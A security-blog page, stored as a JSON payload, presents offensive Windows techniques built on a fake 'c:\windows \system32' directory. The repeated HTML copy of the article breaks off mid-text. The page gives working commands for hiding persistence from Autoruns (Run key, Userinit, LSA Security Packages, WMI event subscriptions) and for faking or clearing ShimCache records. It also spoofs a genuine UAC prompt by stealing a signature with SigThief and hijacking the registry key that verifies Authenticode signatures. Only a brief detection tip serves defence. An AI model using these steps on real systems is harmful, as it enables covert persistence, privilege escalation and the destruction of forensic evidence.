[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f00RlUPjAmdBFTRGnZBHcA0uKBP3S6H5c30falYzeq8U":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},422,"How can an attacker forge a normal UAC prompt by simulating a trusted directory?","The attacker creates a simulated trusted directory and places a malicious executable requiring administrator privileges (e.g., `testuac.exe`) under a legitimate system name like `diskpart.exe`. When executed, UAC displays the path as the trusted `diskpart.exe`, but the missing signature triggers a warning. To fully spoof the prompt, the attacker can use tools like SigThief to steal an Authenticode signature from a legitimate file (e.g., `consent.exe`) and attach it to the malicious binary. This technique builds on the concepts discussed in [Analysis of UAC Bypass Exploitation by Mocking Trusted Directories](\u002Fnews\u002Fanalysis-of-uac-bypass-exploitation-by-mocking-trusted-directories).","\u003Cp>The attacker creates a simulated trusted directory and places a malicious executable requiring administrator privileges (e.g., `testuac.exe`) under a legitimate system name like `diskpart.exe`. When executed, UAC displays the path as the trusted `diskpart.exe`, but the missing signature triggers a warning. To fully spoof the prompt, the attacker can use tools like SigThief to steal an Authenticode signature from a legitimate file (e.g., `consent.exe`) and attach it to the malicious binary. This technique builds on the concepts discussed in [Analysis of UAC Bypass Exploitation by Mocking Trusted Directories](\u002Fnews\u002Fanalysis-of-uac-bypass-exploitation-by-mocking-trusted-directories).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fexpansion-of-techniques-for-exploiting-simulated-trusted-directories\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-forge-a-normal-uac-prompt-by-simulating-a-trusted-directory-1777483915516","UAC prompt, simulated trusted directories, signature forgery, SigThief, privilege escalation",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},106,"Expansion of Techniques for Exploiting Simulated Trusted Directories","expansion-of-techniques-for-exploiting-simulated-trusted-directories","Learn 3 advanced techniques to exploit simulated trusted directories for UAC bypass, Autoruns evasion, and ShimCache deception, with defensive tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Exploitation Analysis of Bypassing UAC by Simulating Trusted Directories', the method of bypassing UAC by simulating trusted directories was analyzed. This article will combine personal experience to introduce three additional exploitation techniques for simulating trusted directories, concluding with defensive recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Bypassing Autoruns by Simulating Trusted Directories\u003C\u002Fli>\u003Cli>Deceiving ShimCache by Simulating Trusted Directories\u003C\u002Fli>\u003Cli>Forging Normal UAC Prompts by Simulating Trusted Directories\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Bypassing Autoruns by Simulating Trusted Directories\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Bypass Principle:\u003C\u002Fp>\u003Cp>Autoruns does not display files with Microsoft signatures by default. If a file contains a Microsoft signature, it will not appear in the Autoruns panel by default.\u003C\u002Fp>\u003Cp>By writing files from simulated trusted directories into Windows startup locations, they are recognized as legitimate files with Microsoft signatures and will not be displayed in the Autoruns panel by default.\u003C\u002Fp>\u003Cp>After testing, it is not applicable to all startup locations. The specific tests are as follows:\u003C\u002Fp>\u003Cp>Create a simulated trusted directory and add test files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003Cbr>md \"\\\\?\\c:\\windows \\system32\"\u003Cbr>copy c:\\test\\putty.exe \"\\\\?\\c:\\windows \\system32\\notepad.exe\"\u003Cbr>copy c:\\test\\calc.dll \"\\\\?\\c:\\windows \\system32\\atl.dll\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>1. Register the startup item HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\u003C\u002Fh3>\u003Cp>Start the file \"C:\\Windows \\System32\\notepad.exe\" at system startup. The command to add the registry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \u002Fv RunTest \u002Ft REG_SZ \u002Fd \"\\\"c:\\windows \\system32\\notepad.exe\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\"In cmd, after escaping, it is represented by \\\"\u003C\u002Fp>\u003Cp>Autoruns detects the registry entry and identifies it as notepad.exe, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017330914_0_211b0bb88e.jpeg\">\u003C\u002Fp>\u003Cp>However, at system startup, the normal notepad.exe is launched instead of putty.exe, which fails\u003C\u002Fp>\u003Ch3>2. Register the startup item Userinit under HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u003C\u002Fh3>\u003Cp>Query the original registry entry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \u002Fv Userinit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The default key value content is: C:\\Windows\\system32\\userinit.exe,\u003C\u002Fp>\u003Cp>To launch the file \"C:\\Windows\\System32\\notepad.exe\" at system startup, the command to add to the registry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \u002Fv Userinit \u002Ft REG_SZ \u002Fd \"C:\\Windows\\system32\\userinit.exe,\\\"c:\\windows\\system32\\notepad.exe\\\",\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\"In cmd, escape double quotes with \\\"\u003C\u002Fp>\u003Cp>Launch putty.exe at system startup. Autoruns detects the registry entry, identifies it as notepad.exe, successfully bypassing detection.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017381967_1_395dcc9cfe.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Autoruns does not display files with Microsoft signatures by default, so it will not show notepad.exe as in the figure above. The above figure is specifically set to display all startup items for demonstration purposes.\u003C\u002Fp>\u003Ch3>3、LSA Providers\u003C\u002Fh3>\u003Cp>Register the startup item Security Packages under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\u003C\u002Fp>\u003Cp>Add the key value \"c:\\windows\\system32\\atl.dll\"\u003C\u002Fp>\u003Cp>Autoruns detects registry entries, identifies them as atl.dll, successfully bypassed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017403845_2_d375313655.jpeg\">\u003C\u002Fp>\u003Ch3>4. WMI\u003C\u002Fh3>\u003Cp>Launches the file \"C:\\Windows\\System32\\notepad.exe\" every 60 seconds. The command to add WMI is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\", QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\", CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, launches putty.exe every minute. Autoruns detects registry entries, identifies them as notepad.exe, successfully bypassed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017453656_3_95b094bbf3.jpeg\">\u003C\u002Fp>\u003Cp>Supplement:\u003C\u002Fp>\u003Cp>The command to view registered WMI information is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter GET __RELPATH \u002FFORMAT:list\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer GET __RELPATH \u002FFORMAT:list\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to delete registered WMI is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"BotFilter82\" DELETE\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"BotConsumer23\" DELETE\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE Filter=\"__EventFilter.Name='BotFilter82'\" DELETE\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Exploiting Trusted Directory Spoofing for ShimCache\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>As mentioned in the previous article \"Penetration Techniques - Acquisition and Clearing of Windows System File Execution Records\":\u003C\u002Fp>\u003Cp>ShimCache not only records the execution of exe files but also records files in the same directory as the exe file (if the file has not been executed, the Executed attribute is no).\u003C\u002Fp>\u003Cp>ShimCache only updates after the system reboots (logging off the current user does not update it).\u003C\u002Fp>\u003Cp>That is to say, there are two methods to clear the ShimCache records from the current system startup to shutdown:\u003C\u002Fp>\u003Cp>\u003Cstrong>(1) Modify the registry\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Back up the current registry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg export \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCompatCache\" ShimCache.reg\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After the system reboots, restore the registry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg import ShimCache.reg\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>(2) Abnormal shutdown\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Skip writing to the registry, unable to record the system boot-to-shutdown log this time\u003C\u002Fp>\u003Cp>\u003Cstrong>(3) Modify memory\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>(Theoretically feasible)\u003C\u002Fp>\u003Cp>Here I attempt to deceive ShimCache by simulating a trusted directory, which is highly deceptive\u003C\u002Fp>\u003Cp>Method as follows:\u003C\u002Fp>\u003Ch4>1. Create trusted directory \"c:\\windows \\system32\"\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003Cbr>md \"\\\\?\\c:\\windows \\system32\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Release file \"c:\\windows \\system32\\calc.exe\"\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy c:\\test\\putty.exe \"\\\\?\\c:\\windows \\system32\\notepad.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>3. Execute\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\"c:\\windows \\system32\\notepad.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>4. Check ShimCache after reboot\u003C\u002Fh4>\u003Cp>Tool used: https:\u002F\u002Fgithub.com\u002Fmandiant\u002FShimCacheParser\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg export \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCompatCache\" ShimCache.reg\u003Cbr>ShimCacheParser.py -o out.csv -r c:\\test\\ShimCache.reg -t\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View results, which can be quite deceptive, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017471150_4_f3ca9956da.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Forge Normal UAC Prompt by Simulating Trusted Directory\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Write a program that requires administrator privileges to run\u003C\u002Fh3>\u003Cp>Using Visual Studio\u003C\u002Fp>\u003Cp>VS project settings location:\u003C\u002Fp>\u003Cp>Configuration Properties -&gt; Linker -&gt; Manifest File, select 'require administrator to run'\u003C\u002Fp>\u003Cp>Alternatively, modify the manifest in the PE file resources\u003C\u002Fp>\u003Ch3>2. Simulate trusted directory and release files\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy c:\\test\\testuac.exe \"\\\\?\\c:\\windows \\system32\\diskpart.exe\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute: \"c:\\windows \\system32\\diskpart.exe\"\u003C\u002Fp>\u003Cp>A UAC prompt pops up, showing the path as the normal diskpart.exe, but the lack of signature will trigger an anomaly warning, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017483505_5_45282ad14b.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Executing the normal diskpart.exe, the UAC prompt is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017493531_6_3528ec8980.jpeg\">\u003C\u002Fp>\u003Cp>To spoof a genuine UAC prompt, Authenticode signature forgery for PE files can be utilized\u003C\u002Fp>\u003Cp>Reference: 'Authenticode Signature Forgery – Signature Forgery and Signature Verification Hijacking for PE Files'\u003C\u002Fp>\u003Ch3>3. Signature Forgery\u003C\u002Fh3>\u003Cp>Using SigThief, the address is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsecretsquirrel\u002FSigThief\u003C\u002Fp>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sigthief.py -i C:\\Windows\\System32\\consent.exe -t c:\\test\\testuac.exe -o c:\\test\\new.exe\u003Cbr>copy c:\\test\\new.exe \"\\\\?\\c:\\windows \\system32\\diskpart.exe\" \u002Fy\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Bypass Certificate Verification\u003C\u002Fh3>\u003Cp>The command to add the registry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"Dll\" \u002Ft REG_SZ \u002Fd \"C:\\Windows\\System32\\ntdll.dll\" \u002Ff\u003Cbr>REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\" \u002Fv \"FuncName\" \u002Ft REG_SZ \u002Fd \"DbgUiContinue\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>5. Final Testing\u003C\u002Fp>\u003Cp>Execute again: \"c:\\windows \\system32\\diskpart.exe\", the UAC prompt is the same as the genuine diskpart.exe, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017501752_7_4936655532.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For the exploitation of simulating trusted directories, the prerequisite is the creation of a forged directory, so monitoring the short filenames of folders can be considered\u003C\u002Fp>\u003Cp>If short filenames similar to system directories appear, they can be flagged\u003C\u002Fp>\u003Cp>Method to view short filenames: dir \u002Fx\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017507825_8_9b37bfca59.jpeg\">\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces three additional exploitation techniques for simulating trusted directories and concludes with defense recommendations\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Exploitation Analysis of Bypassing UAC by Simulating Trusted Directories', the method of bypassing UAC by simulating trusted directories was analyzed. This article will combine personal experience to introduce three additional exploitation techniques for simulating trusted directories, concluding with defensive recommendations.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Bypassing Autoruns by Simulating Trusted Directories\u003C\u002Fli>\u003Cli>Deceiving ShimCache by Simulating Trusted Directories\u003C\u002Fli>\u003Cli>Forging Normal UAC Prompts by Simulating Trusted Directories\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Bypassing Autoruns by Simulating Trusted Directories\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Bypass Principle:\u003C\u002Fp>\u003Cp>Autoruns does not display files with Microsoft signatures by default. If a file contains a Microsoft signature, it will not appear in the Autoruns panel by default.\u003C\u002Fp>\u003Cp>By writing files from simulated trusted directories into Windows startup locations, they are recognized as legitimate files with Microsoft signatures and will not be displayed in the Autoruns panel by default.\u003C\u002Fp>\u003Cp>After testing, it is not applicable to all startup locations. The specific tests are as follows:\u003C\u002Fp>\u003Cp>Create a simulated trusted directory and add test files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>md \"\\\\?\\c:\\windows \"\u003Cbr>md \"\\\\?\\c:\\windows \\system32\"\u003Cbr>copy c:\\test\\putty.exe \"\\\\?\\c:\\windows \\system32\\notepad.exe\"\u003Cbr>copy c:\\test\\calc.dll \"\\\\?\\c:\\windows \\system32\\atl.dll\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>1. Register the startup item HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\u003C\u002Fh3>\u003Cp>Start the file \"C:\\Windows \\System32\\notepad.exe\" at system startup. The command to add the registry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \u002Fv RunTest \u002Ft REG_SZ \u002Fd \"\\\"c:\\windows \\system32\\notepad.exe\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\"In cmd, after escaping, it is represented by \\\"\u003C\u002Fp>\u003Cp>Autoruns detects the registry entry and identifies it as notepad.exe, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017330914_0_211b0bb88e-1.jpeg\">\u003C\u002Fp>\u003Cp>However, at system startup, the normal notepad.exe is launched instead of putty.exe, which fails\u003C\u002Fp>\u003Ch3>2. Register the startup item Userinit under HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u003C\u002Fh3>\u003Cp>Query the original registry entry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \u002Fv Userinit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The default key value content is: C:\\Windows\\system32\\userinit.exe,\u003C\u002Fp>\u003Cp>To launch the file \"C:\\Windows\\System32\\notepad.exe\" at system startup, the command to add to the registry is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \u002Fv Userinit \u002Ft REG_SZ \u002Fd \"C:\\Windows\\system32\\userinit.exe,\\\"c:\\windows\\system32\\notepad.exe\\\",\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\"In cmd, escape double quotes with \\\"\u003C\u002Fp>\u003Cp>Launch putty.exe at system startup. Autoruns detects the registry entry, identifies it as notepad.exe, successfully bypassing detection.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017381967_1_395dcc9cfe-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Autoruns does not display files with Microsoft signatures by default, so it will not show notepad.exe as in the figure above. The above figure is specifically set to display all startup items for demonstration purposes.\u003C\u002Fp>\u003Ch3>3、LSA Providers\u003C\u002Fh3>\u003Cp>Register the startup item Security Packages under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\u003C\u002Fp>\u003Cp>Add the key value \"c:\\windows\\system32\\atl.dll\"\u003C\u002Fp>\u003Cp>Autoruns detects registry entries, identifies them as atl.dll, successfully bypassed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017403845_2_d375313655-1.jpeg\">\u003C\u002Fp>\u003Ch3>4. WMI\u003C\u002Fh3>\u003Cp>Launches the file \"C:\\Windows\\System32\\notepad.exe\" every 60 seconds. The command to add WMI is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\", QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\", CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, launches putty.exe every minute. Autoruns detects registry entries, identifies them as notepad.exe, successfully bypassed\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017453656_3_95b094bbf3-1.jpeg\">\u003C\u002Fp>\u003Cp>Supplement:\u003C\u002Fp>\u003Cp>The command to view registered WMI information is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter GET __RELPATH \u002FFORMAT:list\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer GET __RELPATH \u002FFORMAT:list\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The command to delete registered WMI is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"BotFilter82\" DELETE\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"BotConsumer23\" DELETE\u003Cbr>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE Filter=\"__EventFilter.Name='BotFilter82'\" DELETE\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Exploiting Trusted Directory Spoofing for ShimCache\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>As mentioned in the previous article \"Penetration Techniques - Acquisition and Clearing of Windows System File Execution Records\":\u003C\u002Fp>\u003Cp>ShimCache not only records the execution of exe files but also records files in the same directory as the exe file (if the file has not been executed, the Executed attribute is no).\u003C\u002Fp>\u003Cp>ShimCache only updates after the system reboots (logging off the current user does not update it).\u003C\u002Fp>\u003Cp>That is to say, there are two methods to clear the ShimCache records from the current system startup to shutdown:\u003C\u002Fp>\u003Cp>\u003Cstrong>(1) Modify the registry\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Back up the current registry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg export \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCompatCache\" ShimCache.reg\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After the system reboots, restore the registry:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg import ShimCache.reg\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>(2) Abnormal 